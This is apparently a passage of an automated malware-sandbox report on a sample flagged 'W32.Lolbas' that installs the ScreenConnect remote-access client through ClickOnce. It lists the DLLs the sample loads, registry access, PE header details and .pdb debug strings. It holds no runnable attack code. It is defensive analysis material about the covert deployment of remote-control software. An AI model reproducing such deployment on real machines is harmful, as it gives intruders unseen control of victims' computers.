                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uiautomationcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: certificate valid
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe
                  Source: Binary string: (}C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb@ `5M source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.00000000007FC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.Core.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: @(o.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1445536244.00000000050DA000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.ClientService.pdbJ source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\ScreenConnect.ClientService.pdbpdbice.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: ScreenConnect.Windows.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb1 source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.ClientService.pdb8 source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: %%.pdbnt( source: ScreenConnect.ClientService.exe, 00000005.00000002.1445536244.00000000050DA000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: \ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.ni.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: ScreenConnect.ClientService.pdb8 source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: ScreenConnect.Core.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2709412544.000002728079C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.0000027280238000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.0000027280610000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000004.00000002.1496697785.0000000000D20000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000004.00000002.1496898405.000000000288E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000005.00000002.1444630870.0000000000BE2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000005.00000000.1105925658.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.Core.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdby source: ScreenConnect.WindowsClient.exe, 00000004.00000000.1097848481.0000000000352000.00000002.00000001.01000000.00000009.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000004.00000000.1097848481.0000000000352000.00000002.00000001.01000000.00000009.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2709412544.0000027280088000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000004.00000002.1496639128.0000000000CD2000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: o0C:\Windows\mscorlib.pdb[!x source: ScreenConnect.ClientService.exe, 00000005.00000002.1445536244.00000000050DA000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb;?*b source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1445536244.00000000050DA000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: System.ni.pdbRSDS source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: System.pdbl source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: System.Configuration.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: ?(oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbT source: ScreenConnect.ClientService.exe, 00000005.00000002.1445536244.00000000050DA000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: ScreenConnect.ClientService.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: System.Configuration.ni.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: mscorlib.ni.pdbRSDS source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: System.Configuration.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: System.Xml.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: System.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: oXC:\Windows\ScreenConnect.ClientService.pdbx source: ScreenConnect.ClientService.exe, 00000005.00000002.1443855463.0000000000558000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2709412544.00000272807CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.0000027280522000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.0000027280234000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.000002728060C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000005.00000002.1445175509.0000000004B22000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: Binary string: System.Windows.Forms.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: mscorlib.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.000000000075E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2709412544.0000027280614000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.00000272806D5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2709412544.000002728023C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000005.00000002.1445573934.0000000005112000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdbd8m source: ScreenConnect.ClientService.exe, 00000005.00000002.1444325212.0000000000797000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: symbols\dll\mscorlib.pdbLb source: ScreenConnect.ClientService.exe, 00000005.00000002.1445536244.00000000050DA000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: dfsvc.exe, 00000001.00000002.2709412544.0000027280088000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000004.00000002.1496639128.0000000000CD2000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: System.ni.pdb source: WERE665.tmp.dmp.8.dr
                  Source: Binary string: System.Core.ni.pdbRSDS source: WERE665.tmp.dmp.8.dr
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
